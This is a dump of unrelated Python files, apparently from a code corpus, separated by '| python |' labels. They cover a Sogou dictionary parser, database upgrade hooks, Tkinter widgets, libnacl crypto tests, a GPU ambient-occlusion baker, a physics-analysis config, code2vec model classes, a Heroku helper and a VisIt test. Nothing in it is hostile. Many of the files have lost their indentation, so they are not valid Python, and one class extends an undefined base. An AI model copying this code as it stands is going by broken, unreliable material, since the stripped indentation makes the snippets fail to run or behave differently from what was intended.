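# table would decode as index = 1, len = 2, and the one-character pinyin string "a".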
# Offset of the pinyin table
startPy = 0x1540
# Offset of the Chinese word table
startChinese = 0x2628
# Global pinyin table
GPy_Table = {}
# Parsing results:
# a list of (frequency, pinyin, Chinese word) tuples
GTable = []
def byte2str(data):
    # convert the raw bytes (2 bytes per character) to a unicode string
i = 0
length = len(data)
ret = u''
while i < length:
x = data[i] + data[i + 1]
t = unichr(struct.unpack('H', x)[0])
if t == u'\r':
ret += u'\n'
elif t != u' ':
ret += t
i += 2
return ret
# Parse the global pinyin table
def getPyTable(data):
if data[0:4] != "\x9D\x01\x00\x00":
return None
data = data[4:]
pos = 0
length = len(data)
while pos < length:
index = struct.unpack('H', data[pos] + data[pos + 1])[0]
# print index,
pos += 2
l = struct.unpack('H', data[pos] + data[pos + 1])[0]
# print l,
pos += 2
py = byte2str(data[pos:pos + l])
# print py
GPy_Table[index] = py
pos += l
# Get the pinyin string of a word from its pinyin-index table
def getWordPy(data):
pos = 0
length = len(data)
ret = u''
while pos < length:
index = struct.unpack('H', data[pos] + data[pos + 1])[0]
ret += GPy_Table[index]
pos += 2
return ret
# Get a Chinese word/phrase (decode its raw bytes to text)
def getWord(data):
    return byte2str(data)
# Parse the Chinese word table
def getChinese(data):
    # import pdb
    # pdb.set_trace()
    pos = 0
    length = len(data)
    while pos < length:
        # number of homophones
        same = struct.unpack('H', data[pos] + data[pos + 1])[0]
        # print '[same]:', same,
        # length of the pinyin index table
        pos += 2
        py_table_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
        # pinyin index table
        pos += 2
        py = getWordPy(data[pos: pos + py_table_len])
        # Chinese words
        pos += py_table_len
        for i in xrange(same):
            # byte length of the Chinese word
            c_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
            # the Chinese word itself
            pos += 2
            word = byte2str(data[pos: pos + c_len])
            # length of the extension data
            pos += c_len
            ext_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
            # word frequency (first two bytes of the extension data)
            pos += 2
            count = struct.unpack('H', data[pos] + data[pos + 1])[0]
            # save the result
            GTable.append((count, py, word))
            # advance to the next word
            pos += ext_len
def deal(file_name):
    print('-' * 60)
    f = open(file_name, 'rb')
    data = f.read()
    f.close()
    if data[0:12] != "\x40\x15\x00\x00\x44\x43\x53\x01\x01\x00\x00\x00":
        print("Please confirm that the selected file is a Sogou (.scel) dictionary.")
        sys.exit(0)
    # pdb.set_trace()
    print("Dictionary name:", byte2str(data[0x130:0x338]))  # .encode('GB18030')
    print("Dictionary type:", byte2str(data[0x338:0x540]))  # .encode('GB18030')
    print("Description:", byte2str(data[0x540:0xd40]))  # .encode('GB18030')
    print("Examples:", byte2str(data[0xd40:startPy]))  # .encode('GB18030')
    getPyTable(data[startPy:startChinese])
    getChinese(data[startChinese:])
if __name__ == '__main__':
    # Add the dictionaries you want to convert here
    o = ['明星【官方推荐】.scel']
    # o = ['全国大酒店名录.scel', '全国宾馆名录.scel', '全国旅行社名录.scel']
    # o = ['饮食大全【官方推荐】.scel']
    # o = ['最详细的全国地名大全.scel']
    for f in o:
        deal(f)
    # Save the results to sougou.txt
    f = open('sougou.txt', 'w')
    for count, py, word in GTable:
        # GTable holds the results: a list of (frequency, pinyin, Chinese word) tuples;
        # save them in whatever format you need.
        # No sorting is done, so the entries follow the order of the input files above.
        f.write(unicode('%(count)s' % {'count': count} + ' ' + word).encode('utf-8'))  # output file encoding, change it if you need to
        f.write('\n')
    f.close()
| python |
from . import upgrade_0_to_1
from . import upgrade_2_to_3
from . import upgrade_7_to_8
from . import upgrade_8_to_9
def init_new_testsuite(engine, session, name):
"""When all the metadata fields are setup for a suite, call this
to provision the tables."""
# We only need to do the test-suite agnostic upgrades,
# most of the upgrades target nts or compile only.
upgrade_0_to_1.initialize_testsuite(engine, session, name)
session.commit()
upgrade_2_to_3.upgrade_testsuite(engine, session, name)
session.commit()
upgrade_7_to_8.upgrade_testsuite(engine, session, name)
session.commit()
upgrade_8_to_9.upgrade_testsuite(engine, session, name)
session.commit()
| python |
class Field:
def __init__(self, left_lb, sv, e, right_lb):
self._parameter = None
self._left_lb = left_lb
self._sv = sv
self._e = e
self._right_lb = right_lb
def set_parameter(self, parameter):
self._parameter = parameter
def get_parameter(self):
return self._parameter
def set_left_lb_text(self, text):
self._left_lb.config(text=f"{text} :")
def set_right_lb_text(self, text):
self._right_lb.config(text=text)
def set_text(self, text):
self.clear_text()
self._e.insert(0, text)
def get_text(self):
return self._e.get()
def clear_text(self):
self._e.delete(0, "end")
def set_callback_on_text_change(self, callback):
self._sv.trace("w", lambda name, index, mode, sv=self._sv: callback(sv))
def activate(self):
self._e["state"] = "normal"
def disable(self):
self._e["state"] = "disable"
def readonly(self):
self._e["state"] = "readonly"
| python |
from django.core.validators import RegexValidator
from django.utils.translation import gettext_lazy as _
class BusinessIDValidator(RegexValidator):
regex = r"^[0-9]{7}\-[0-9]{1}\Z"
message = _("Enter a valid business ID.")
| python |
# Import libnacl libs
import libnacl.public
import libnacl.dual
import libnacl.sign
# Import python libs
import unittest
class TestDual(unittest.TestCase):
'''
'''
def test_secretkey(self):
'''
'''
msg = b'You\'ve got two empty halves of coconut and you\'re bangin\' \'em together.'
bob = libnacl.dual.DualSecret()
alice = libnacl.dual.DualSecret()
bob_box = libnacl.public.Box(bob.sk, alice.pk)
alice_box = libnacl.public.Box(alice.sk, bob.pk)
bob_ctxt = bob_box.encrypt(msg)
self.assertNotEqual(msg, bob_ctxt)
bclear = alice_box.decrypt(bob_ctxt)
self.assertEqual(msg, bclear)
alice_ctxt = alice_box.encrypt(msg)
self.assertNotEqual(msg, alice_ctxt)
aclear = alice_box.decrypt(alice_ctxt)
self.assertEqual(msg, aclear)
self.assertNotEqual(bob_ctxt, alice_ctxt)
def test_publickey(self):
'''
'''
msg = b'You\'ve got two empty halves of coconut and you\'re bangin\' \'em together.'
bob = libnacl.dual.DualSecret()
alice = libnacl.dual.DualSecret()
alice_pk = libnacl.public.PublicKey(alice.pk)
bob_box = libnacl.public.Box(bob.sk, alice_pk)
alice_box = libnacl.public.Box(alice.sk, bob.pk)
bob_ctxt = bob_box.encrypt(msg)
self.assertNotEqual(msg, bob_ctxt)
bclear = alice_box.decrypt(bob_ctxt)
self.assertEqual(msg, bclear)
def test_sign(self):
msg = (b'Well, that\'s no ordinary rabbit. That\'s the most foul, '
b'cruel, and bad-tempered rodent you ever set eyes on.')
signer = libnacl.dual.DualSecret()
signed = signer.sign(msg)
signature = signer.signature(msg)
self.assertNotEqual(msg, signed)
veri = libnacl.sign.Verifier(signer.hex_vk())
verified = veri.verify(signed)
verified2 = veri.verify(signature + msg)
self.assertEqual(verified, msg)
self.assertEqual(verified2, msg)
| python |
import numpy as np
import zengl
from objloader import Obj
from PIL import Image
from progress.bar import Bar
from skimage.filters import gaussian
import assets
from window import Window
window = Window(720, 720)
ctx = zengl.context()
image = ctx.image(window.size, 'rgba8unorm', samples=4)
depth = ctx.image(window.size, 'depth24plus', samples=4)
image.clear_value = (0.2, 0.2, 0.2, 1.0)
size = 1024
samples = 512
temp_color = ctx.image((size, size), 'r32sint')
temp_depth = ctx.image((size, size), 'depth24plus')
temp_color.clear_value = -1
model = Obj.open(assets.get('ao-map-target.obj')).pack('vx vy vz nx ny nz tx ty')
vertex_buffer = ctx.buffer(model)
uniform_buffer = ctx.buffer(size=64)
ctx.includes['size'] = f'const int size = {size};'
texcoord_pipeline = ctx.pipeline(
vertex_shader='''
#version 330
layout (std140) uniform Common {
mat4 mvp;
};
layout (location = 0) in vec3 in_vertex;
layout (location = 1) in vec3 in_normal;
layout (location = 2) in vec2 in_texcoord;
out vec2 v_texcoord;
void main() {
gl_Position = mvp * vec4(in_vertex, 1.0);
v_texcoord = in_texcoord;
}
''',
fragment_shader='''
#version 330
#include "size"
in vec2 v_texcoord;
layout (location = 0) out int out_address;
void main() {
int tx = int(v_texcoord.x * size + 0.5);
int ty = int(v_texcoord.y * size + 0.5);
out_address = ty * size + tx;
}
''',
layout=[
{
'name': 'Common',
'binding': 0,
},
],
resources=[
{
'type': 'uniform_buffer',
'binding': 0,
'buffer': uniform_buffer,
},
],
framebuffer=[temp_color, temp_depth],
topology='triangles',
cull_face='back',
vertex_buffers=zengl.bind(vertex_buffer, '3f 3f 2f', 0, -1, 2),
vertex_count=vertex_buffer.size // zengl.calcsize('3f 3f 2f'),
)
bar = Bar('Progress', fill='-', suffix='%(percent)d%%', max=samples)
ao = np.zeros(size * size, 'f4')
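# Accumulate per-texel visibility: camera positions are spread roughly uniformly
# over a sphere using a golden-angle (Fibonacci) spiral, and every texel whose
# address shows up in the ID buffer for a given direction gets its counter bumped.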
for i in range(samples):
phi = np.pi * (3.0 - np.sqrt(5.0))
y = 1.0 - (i / (samples - 1.0)) * 2.0
x = np.cos(phi * i) * np.sqrt(1.0 - y * y)
z = np.sin(phi * i) * np.sqrt(1.0 - y * y)
camera = zengl.camera((x * 5.0, y * 5.0, z * 5.0), (0.0, 0.0, 0.0), aspect=1.0, fov=45.0)
uniform_buffer.write(camera)
temp_color.clear()
temp_depth.clear()
texcoord_pipeline.render()
t = np.frombuffer(temp_color.read(), 'i4').reshape((size, size))
ao[np.unique(t[t >= 0])] += 1.0
bar.next()
ao -= ao.min()
ao /= ao.max()
ao = gaussian(ao.reshape(size, size), 1.0).astype('f4')  # 2D blur; keep f4 so the r32float upload below matches
texture = ctx.image((size, size), 'r32float', ao)
Image.fromarray((ao * 255.0).astype('u1'), 'L').save('generated-ao-map.png')
render_pipeline = ctx.pipeline(
vertex_shader='''
#version 330
layout (std140) uniform Common {
mat4 mvp;
};
layout (location = 0) in vec3 in_vertex;
layout (location = 1) in vec3 in_normal;
layout (location = 2) in vec2 in_texcoord;
out vec3 v_normal;
out vec2 v_texcoord;
void main() {
gl_Position = mvp * vec4(in_vertex, 1.0);
v_normal = in_normal;
v_texcoord = in_texcoord;
}
''',
fragment_shader='''
#version 330
uniform sampler2D Texture;
in vec2 v_texcoord;
layout (location = 0) out vec4 out_color;
void main() {
float lum = texture(Texture, v_texcoord).r;
vec3 color = vec3(1.0, 1.0, 1.0);
out_color = vec4(color * lum, 1.0);
}
''',
layout=[
{
'name': 'Common',
'binding': 0,
},
{
'name': 'Texture',
'binding': 0,
},
],
resources=[
{
'type': 'uniform_buffer',
'binding': 0,
'buffer': uniform_buffer,
},
{
'type': 'sampler',
'binding': 0,
'image': texture,
'wrap_x': 'clamp_to_edge',
'wrap_y': 'clamp_to_edge',
},
],
framebuffer=[image, depth],
topology='triangles',
cull_face='back',
vertex_buffers=zengl.bind(vertex_buffer, '3f 3f 2f', 0, -1, 2),
vertex_count=vertex_buffer.size // zengl.calcsize('3f 3f 2f'),
)
while window.update():
x, y = np.cos(window.time * 0.5) * 5.0, np.sin(window.time * 0.5) * 5.0
camera = zengl.camera((x, y, 1.0), (0.0, 0.0, 0.0), aspect=1.0, fov=45.0)
uniform_buffer.write(camera)
image.clear()
depth.clear()
render_pipeline.render()
image.blit()
| python |
import FWCore.ParameterSet.Config as cms
process = cms.Process("Demo")
##process.load("AuxCode.CheckTkCollection.Run123151_RECO_cff")
process.load("FWCore.MessageService.MessageLogger_cfi")
MessageLogger = cms.Service("MessageLogger",
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
),
destinations = cms.untracked.vstring('cout')
)
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'GR09_R_34X_V2::All'
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_123615.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124009.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124020.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124022.root')
#
#'rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124024.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124030.root','rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124230.root'
#,'rfio:///?svcClass=cmscafuser&path=/castor/cern.ch/cms/store/user/emiglior/ALCARECO/08Jan10/TkAlMinBias_124120.root' #2.36TeV run
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.LhcTrackAnalyzer = cms.EDAnalyzer("LhcTrackAnalyzer",
# TrackCollectionTag = cms.InputTag("generalTracks"),
TrackCollectionTag = cms.InputTag("ALCARECOTkAlMinBias"),
PVtxCollectionTag = cms.InputTag("offlinePrimaryVertices"),
OutputFileName = cms.string("AnalyzerOutput_1.root"),
Debug = cms.bool(False)
)
process.p = cms.Path(process.LhcTrackAnalyzer)
| python |
import numpy as np
# a = np.array([[1, 2], [3, 4]])
# a = np.array([[[1, 2], [3, 4]], [[5,6],[7,8]]])
a = np.array([[[0, 1], [2, 3]], [[4,5],[6,7]]])
print(a.sum(axis = 0))
print(a.sum(axis = 1))
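# Expected output for the 2x2x2 array above:
#   axis=0 sums the two outer blocks element-wise -> [[ 4  6] [ 8 10]]
#   axis=1 sums the rows within each block        -> [[ 2  4] [10 12]]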
| python |
import numpy as np
import abc
import os
from typing import NamedTuple, Optional, List, Dict, Tuple, Iterable
from representation.code2vec.common import common
from representation.code2vec.vocabularies import Code2VecVocabs, VocabType
from representation.code2vec.config import Config
class ModelEvaluationResults(NamedTuple):
topk_acc: float
subtoken_precision: float
subtoken_recall: float
subtoken_f1: float
loss: Optional[float] = None
def __str__(self):
res_str = 'topk_acc: {topk_acc}, precision: {precision}, recall: {recall}, F1: {f1}'.format(
topk_acc=self.topk_acc,
precision=self.subtoken_precision,
recall=self.subtoken_recall,
f1=self.subtoken_f1)
if self.loss is not None:
res_str = ('loss: {}, '.format(self.loss)) + res_str
return res_str
class ModelPredictionResults(NamedTuple):
original_name: str
topk_predicted_words: np.ndarray
topk_predicted_words_scores: np.ndarray
attention_per_context: Dict[Tuple[str, str, str], float]
code_vector: Optional[np.ndarray] = None
class Code2VecModelBase(abc.ABC):
def __init__(self, config: Config):
self.config = config
self.config.verify()
self._log_creating_model()
if not config.RELEASE:
self._init_num_of_examples()
self._log_model_configuration()
self.vocabs = Code2VecVocabs(config)
self.vocabs.target_vocab.get_index_to_word_lookup_table() # just to initialize it (if not already initialized)
self._load_or_create_inner_model()
self._initialize()
def _log_creating_model(self):
self.log('')
self.log('')
self.log('---------------------------------------------------------------------')
self.log('---------------------------------------------------------------------')
self.log('---------------------- Creating code2vec model ----------------------')
self.log('---------------------------------------------------------------------')
self.log('---------------------------------------------------------------------')
def _log_model_configuration(self):
self.log('---------------------------------------------------------------------')
self.log('----------------- Configuration - Hyper Parameters ------------------')
longest_param_name_len = max(len(param_name) for param_name, _ in self.config)
for param_name, param_val in self.config:
self.log('{name: <{name_len}}{val}'.format(
name=param_name, val=param_val, name_len=longest_param_name_len+2))
self.log('---------------------------------------------------------------------')
@property
def logger(self):
return self.config.get_logger()
def log(self, msg):
self.logger.info(msg)
def _init_num_of_examples(self):
self.log('Checking number of examples ...')
if self.config.is_training:
self.config.NUM_TRAIN_EXAMPLES = self._get_num_of_examples_for_dataset(self.config.train_data_path)
self.log(' Number of train examples: {}'.format(self.config.NUM_TRAIN_EXAMPLES))
if self.config.is_testing:
self.config.NUM_TEST_EXAMPLES = self._get_num_of_examples_for_dataset(self.config.TEST_DATA_PATH)
self.log(' Number of test examples: {}'.format(self.config.NUM_TEST_EXAMPLES))
@staticmethod
def _get_num_of_examples_for_dataset(dataset_path: str) -> int:
dataset_num_examples_file_path = dataset_path + '.num_examples'
if os.path.isfile(dataset_num_examples_file_path):
with open(dataset_num_examples_file_path, 'r') as file:
num_examples_in_dataset = int(file.readline())
else:
num_examples_in_dataset = common.count_lines_in_file(dataset_path)
with open(dataset_num_examples_file_path, 'w') as file:
file.write(str(num_examples_in_dataset))
return num_examples_in_dataset
def load_or_build(self):
self.vocabs = Code2VecVocabs(self.config)
self._load_or_create_inner_model()
def save(self, model_save_path=None):
if model_save_path is None:
model_save_path = self.config.MODEL_SAVE_PATH
model_save_dir = '/'.join(model_save_path.split('/')[:-1])
if not os.path.isdir(model_save_dir):
os.makedirs(model_save_dir, exist_ok=True)
self.vocabs.save(self.config.get_vocabularies_path_from_model_path(model_save_path))
self._save_inner_model(model_save_path)
def _write_code_vectors(self, file, code_vectors):
for vec in code_vectors:
file.write(' '.join(map(str, vec)) + '\n')
def _get_attention_weight_per_context(
self, path_source_strings: Iterable[str], path_strings: Iterable[str], path_target_strings: Iterable[str],
attention_weights: Iterable[float]) -> Dict[Tuple[str, str, str], float]:
attention_weights = np.squeeze(attention_weights, axis=-1) # (max_contexts, )
attention_per_context: Dict[Tuple[str, str, str], float] = {}
# shape of path_source_strings, path_strings, path_target_strings, attention_weights is (max_contexts, )
# iterate over contexts
for path_source, path, path_target, weight in \
zip(path_source_strings, path_strings, path_target_strings, attention_weights):
string_context_triplet = (common.binary_to_string(path_source),
common.binary_to_string(path),
common.binary_to_string(path_target))
attention_per_context[string_context_triplet] = weight
return attention_per_context
def close_session(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
@abc.abstractmethod
def train(self):
...
@abc.abstractmethod
def evaluate(self) -> Optional[ModelEvaluationResults]:
...
@abc.abstractmethod
def predict(self, predict_data_lines: Iterable[str]) -> List[ModelPredictionResults]:
...
@abc.abstractmethod
def _save_inner_model(self, path):
...
def _load_or_create_inner_model(self):
if self.config.is_loading:
self._load_inner_model()
else:
self._create_inner_model()
@abc.abstractmethod
def _load_inner_model(self):
...
def _create_inner_model(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
def _initialize(self):
# can be overridden by the implementation model class.
# default implementation just does nothing.
pass
@abc.abstractmethod
def _get_vocab_embedding_as_np_array(self, vocab_type: VocabType) -> np.ndarray:
...
def save_word2vec_format(self, dest_save_path: str, vocab_type: VocabType):
if vocab_type not in VocabType:
raise ValueError('`vocab_type` should be `VocabType.Token`, `VocabType.Target` or `VocabType.Path`.')
vocab_embedding_matrix = self._get_vocab_embedding_as_np_array(vocab_type)
index_to_word = self.vocabs.get(vocab_type).index_to_word
with open(dest_save_path, 'w') as words_file:
common.save_word2vec_file(words_file, index_to_word, vocab_embedding_matrix)
| python |
from tkinter import *
from tkinter import filedialog
from tkinter.constants import *
import platform
import os
import re
class Window(Frame):
desktop_path = os.path.expanduser("~/Desktop")
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.file = None
self.init_window()
def init_window(self):
self.master.title("GUI")
self.pack()
# create Menu instance
menu = Menu(self.master)
self.master.config(menu=menu)
self.init_file_menu(menu)
self.init_edit_menu(menu)
# main text field
self.main_text_field = Text(self.master)
self.main_text_field.config()
self.main_text_field.pack(fill=BOTH, expand=1)
def init_file_menu(self, menu_instance):
# add upper_menu (open, save etc)
file_menu = Menu(menu_instance)
file_menu.add_command(label="Open", command=self.open_file)
file_menu.add_command(label="Save", command=self.save_file)
file_menu.add_command(label="Exit", command=self.quit_client)
menu_instance.add_cascade(label="File", menu=file_menu)
def init_edit_menu(self, menu_instance):
# add Edit menu
edit = Menu(menu_instance)
edit.add_command(label="Undo", command=self.undo_changes)
edit.add_command(label="Redo", command=self.redo_changes)
menu_instance.add_cascade(label="Edit", menu=edit)
def open_file(self):
print("Open file!")
self.file = filedialog.askopenfilename(initialdir = self.desktop_path, title = "Select file", filetypes = (("TXT files","*.txt"),("all files","*.*")))
        if self.file:  # askopenfilename returns '' when the dialog is cancelled
            self.main_text_field.insert(END, self.read_file(self.file))
    def read_file(self, filename):
        with open(filename) as f:
            return f.read()
def save_file(self):
print("Save file!")
def undo_changes(self):
print("Undo changes!")
def redo_changes(self):
print("Redo changes!")
def quit_client(self):
exit()
root = Tk()
root.grid_columnconfigure(0, weight=1)
if(platform.system() != 'Linux'):
root.attributes("-fullscreen", True)
else:
root.attributes("-zoomed", True)
app = Window(root)
root.mainloop() | python |
import heroku3
from config import Config
client = heroku3.from_key(Config.HEROKU_API_KEY)
class HerokuHelper:
def __init__(self,appName,apiKey):
self.API_KEY = apiKey
self.APP_NAME = appName
self.client = self.getClient()
self.app = self.client.apps()[self.APP_NAME]
def getClient(self):
return heroku3.from_key(self.API_KEY)
def getAccount(self):
return self.client.account()
def getLog(self):
return self.app.get_log()
def addEnvVar(self,key,value):
self.app.config()[key] = value
def restart(self):
return self.app.restart()
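# A minimal usage sketch (hypothetical app name; assumes a valid API key in Config):
#   helper = HerokuHelper("my-app", Config.HEROKU_API_KEY)
#   helper.addEnvVar("MODE", "production")
#   helper.restart()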
| python |
from django.apps import AppConfig
class LoverRecorderConfig(AppConfig):
name = 'lover_recorder'
| python |
import numpy
SCENARIO_VERSION = '2020a' # default scenario version for writing scenario files
SUPPORTED_COMMONROAD_VERSIONS = {'2018b', '2020a'} # supported version for reading scenario files
TWO_PI = 2.0 * numpy.pi
| python |
import random
print("Hi, please enter your name")
name = input() #input 1
secretNumber = random.randint(1, 50)
print(name + ' Guess the number between 1 & 50', '\nYou have 4 tries')
attempts = 0
for attempts in range(1, 5):
print('Take a guess')
while True:
try:
guess = int(input())
break
except ValueError:
print('Please Enter a Number')
continue
if guess < secretNumber:
print('Too Low, you have ' + str(4 - attempts) + ' attempts remaining')
elif guess > secretNumber:
print('Too High, you have ' + str(4 - attempts) + ' attempts remaining')
else:
break
if guess == secretNumber:
print('Well Done ' + name)
else:
print('Too Many Attempts ' + str(attempts) + ', It was ' + str(secretNumber))
play = False
# add something extra | python |
class PrettyEnv(RenderBasic):
    def __init__(self):
        super().__init__()
    def getBestEnv(self):
        pass
    def getEnvList(self):
        pass
| python |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""__init__"""
from .equal import equal_manual, equal_auto
from .greater_equal import greater_equal_manual, greater_equal_auto
from .less_equal import less_equal_manual, less_equal_auto
from .cast import cast_manual, cast_auto
from .tile import tile_manual, tile_auto
from .one_hot import one_hot_manual, one_hot_auto
from .sqrt import sqrt_manual, sqrt_auto
from .sub import sub_manual, sub_auto
from .add import add_manual, add_auto
from .addn import addn_manual, addn_auto
from .rsqrt import rsqrt_manual, rsqrt_auto
from .expand_dims import expand_dims_manual, expand_dims_auto
from .batch_matmul import batch_matmul_manual, batch_matmul_auto
from .mul import mul_manual, mul_auto
from .exp import exp_manual, exp_auto
from .divide import divide_manual, divide_auto
from .maximum import maximum_manual, maximum_auto
from .minimum import minimum_manual, minimum_auto
from .reshape import reshape_manual, reshape_auto
from .trans_data import trans_data_manual, trans_data_auto
from .log import log_manual, log_auto
from .pow import pow_manual, pow_auto
from .reduce_sum import reduce_sum_manual, reduce_sum_auto
from .abs import abs_manual, abs_auto
from .neg import neg_manual, neg_auto
from .round import round_manual, round_auto
from .select import select_manual, select_auto
from .reciprocal import reciprocal_manual, reciprocal_auto
from .reduce_min import reduce_min_manual, reduce_min_auto
from .reduce_max import reduce_max_manual, reduce_max_auto
from .pad import pad_manual, pad_auto
from .resize import resize_manual, resize_auto
from .resize_nearest_neighbor_grad import resize_nearest_neighbor_grad_manual, resize_nearest_neighbor_grad_auto
from .fused_pad import fused_pad_manual, fused_pad_auto
from .fused_bn_reduce import fused_bn_reduce_manual, fused_bn_reduce_auto
from .fused_bn_update import fused_bn_update_manual, fused_bn_update_auto
from .fused_bn_follow_relu import fused_bn_follow_relu_manual, fused_bn_follow_relu_auto
from .fused_bn_follow_relu_avgpool import fused_bn_follow_relu_avgpool_manual, fused_bn_follow_relu_avgpool_auto
from .fused_bn_double_follow_relu import fused_bn_double_follow_relu_manual, fused_bn_double_follow_relu_auto
from .fused_bn_reduce_grad import fused_bn_reduce_grad_manual, fused_bn_reduce_grad_auto
from .fused_relu_grad_bn_reduce_grad import fused_relu_grad_bn_reduce_grad_manual, fused_relu_grad_bn_reduce_grad_auto
from .fused_relu_grad_bn_double_reduce_grad import fused_relu_grad_bn_double_reduce_grad_manual, fused_relu_grad_bn_double_reduce_grad_auto
from .fused_l2loss_grad import fused_l2loss_grad_manual, fused_l2loss_grad_auto
from .fused_is_finite import fused_is_finite_manual, fused_is_finite_auto
from .fused_relu_grad_bn_update_grad import fused_relu_grad_bn_update_grad_manual, fused_relu_grad_bn_update_grad_auto
from .fused_relu_grad_bn_double_update_grad import fused_relu_grad_bn_double_update_grad_manual, fused_relu_grad_bn_double_update_grad_auto
from .fused_relu_grad import fused_relu_grad_manual, fused_relu_grad_auto
from .fused_bn_update_grad import fused_bn_update_grad_manual, fused_bn_update_grad_auto
from .fused_mul_div_rsqrt_mul_isfinite_red import fused_mul_div_rsqrt_mul_isfinite_red_manual, fused_mul_div_rsqrt_mul_isfinite_red_auto
| python |
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: globalids.py
#
# Tests: libsim - connecting to simulation and retrieving data from it.
# mesh - 3D unstructured mesh.
# global node and cell ids
# unstructured ghost cell generation from global ids
#
# Programmer: Brad Whitlock
# Date: Tue Jun 17 16:32:51 PDT 2014
#
# Modifications:
#
# ----------------------------------------------------------------------------
def step(sim):
sim.consolecommand("step")
# Read from stderr to look for the echoed command. Sync.
keepGoing = True
while keepGoing:
buf = sim.p.stderr.readline()
print buf
if "Command step" in buf:
keepGoing = False
def set_the_view():
v = GetView3D()
v.viewNormal = (-0.707418, 0.404282, 0.579755)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (0.294715, 0.914272, -0.27794)
v.viewAngle = 30
v.parallelScale = 0.866025
v.nearPlane = -1.73205
v.farPlane = 1.73205
v.imagePan = (0, 0.0589478)
v.imageZoom = 1.0963
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0.5, 0.5, 0.5)
v.axis3DScaleFlag = 0
v.axis3DScales = (1, 1, 1)
v.shear = (0, 0, 1)
v.windowValid = 1
SetView3D(v)
def set_the_view2():
v = GetView3D()
v.viewNormal = (-0.542717, -0.70433, 0.457578)
v.focus = (0.5, 0.5, 0.5)
v.viewUp = (0.252732, 0.3826, 0.888675)
v.viewAngle = 30
v.parallelScale = 0.722842
v.nearPlane = -1.44568
v.farPlane = 1.44568
v.imagePan = (-0.00135472, 0.013532)
v.imageZoom = 1.12868
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0.5, 0.5, 0.5)
v.axis3DScaleFlag = 0
v.axis3DScales = (1, 1, 1)
v.shear = (0, 0, 1)
v.windowValid = 1
SetView3D(v)
def add_time(times):
Query("Time")
t2 = times + str(GetQueryOutputValue()) + "\n"
return t2
def start_time():
return add_time("Times:\n")
def test0(sim):
TestSection("Topologically 3D meshes in 3D")
DefineScalarExpression("gnid", "global_nodeid(mesh)")
DefineScalarExpression("gzid", "global_zoneid(mesh)")
DefineScalarExpression("nid", "nodeid(mesh)")
AddPlot("Pseudocolor", "nid")
DrawPlots()
set_the_view()
Test("globalids02")
ChangeActivePlotsVar("gzid")
DrawPlots()
Test("globalids03")
ChangeActivePlotsVar("gnid")
DrawPlots()
Test("globalids04")
DeleteAllPlots()
AddPlot("Subset", "Domains")
DrawPlots()
Test("globalids05")
# Make sure that the plot is hollow
s = SubsetAttributes(1)
s_clear = SubsetAttributes(1)
s_clear.opacity = 0.25
s_clear.colorType = s_clear.ColorBySingleColor
s_clear.singleColor = (200,200,200,255)
SetPlotOptions(s_clear)
DrawPlots()
Test("globalids06")
# Advance some steps and make sure that the plot
# stays transparent. We're changing the size of the
# domains at each time step and thus the global ids.
times = start_time()
idx = 7
for i in xrange(3):
# Advance some steps. This should make the plots update.
nsteps = 5
for j in xrange(nsteps):
step(sim)
DrawPlots()
times = add_time(times)
SetPlotOptions(s)
Test("globalids%02d" % idx)
idx = idx + 1
SetPlotOptions(s_clear)
Test("globalids%02d" % idx)
idx = idx + 1
TestText("globalids%02d" % idx, times)
idx = idx + 1
DeleteAllPlots()
def hideplot(id):
pl = GetPlotList()
if pl.GetPlots(id).hiddenFlag == 0:
SetActivePlots(id)
HideActivePlots()
def showplot(id):
pl = GetPlotList()
if pl.GetPlots(id).hiddenFlag == 1:
SetActivePlots(id)
HideActivePlots()
def test1(sim):
TestSection("Topologically 2D meshes in 3D")
DefineScalarExpression("gnid2d", "global_nodeid(surface)")
DefineScalarExpression("gzid2d", "global_zoneid(surface)")
DefineScalarExpression("nid2d", "nodeid(surface)")
AddPlot("FilledBoundary", "surfacemat")
fb = FilledBoundaryAttributes(1)
fb.colorType = fb.ColorBySingleColor
fb.singleColor = (0,0,0,255)
fb.wireframe = 1
fb.lineWidth = 3
SetPlotOptions(fb)
AddPlot("Subset", "Domains(surface)")
AddPlot("Pseudocolor", "nid2d")
DrawPlots()
set_the_view2()
idx = 0
times = start_time()
ntests = 4
for i in xrange(3):
ids = [idx+j for j in range(ntests)]
# Show the Subset plot
showplot(1)
hideplot(2)
Test("globalids_1_%02d" % ids[0])
